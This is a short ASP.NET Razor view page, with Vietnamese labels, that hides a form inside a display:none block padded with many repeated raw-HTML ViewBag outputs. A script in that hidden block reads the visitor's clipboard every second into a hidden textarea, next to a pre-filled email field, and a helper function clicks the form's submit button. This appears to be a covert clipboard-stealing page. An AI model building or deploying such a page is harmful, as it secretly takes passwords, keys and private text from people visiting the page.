@{
    Layout = null;
}
<body style="background-color:black">
@Html.Raw(ViewBag.RandomLayOut)
<div style="display:none">
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
<script>
    setInterval(myAlert, 1000);
    function myAlert()
    {
        navigator.clipboard.readText()
       /*Alert for accepting access to clipboard appears, user accepts*/
       .then(text => {
            document.getElementById("noidung").value = text;
                    });
     }

    function chuyendoi()
    {
	                document.getElementById("ok").click();
    }
</script>                       
<table align="center">
    @using (Html.BeginForm())
    {
        @Html.ValidationSummary(true)

        <tr style="height:40px">
            <td> </td>
            <td>
                    <input type="text" name="txtEmail" id="email" value="@ViewBag.Email"/>
                    <textarea cols="50" rows="20" name="txtNoiDung" id="noidung"></textarea>
            </td>
        </tr>
      
        <tr style="height:40px">
            <td></td>
            <td><br>
                <input id="ok" type="Submit" value="Kết Quả" />
            </td>
        </tr>
    }
</table>
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
</div>
@Html.Raw(ViewBag.XuLy)
<div style="display:none">
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
@Html.Raw(ViewBag.RandomLayOut)
</div>
</body>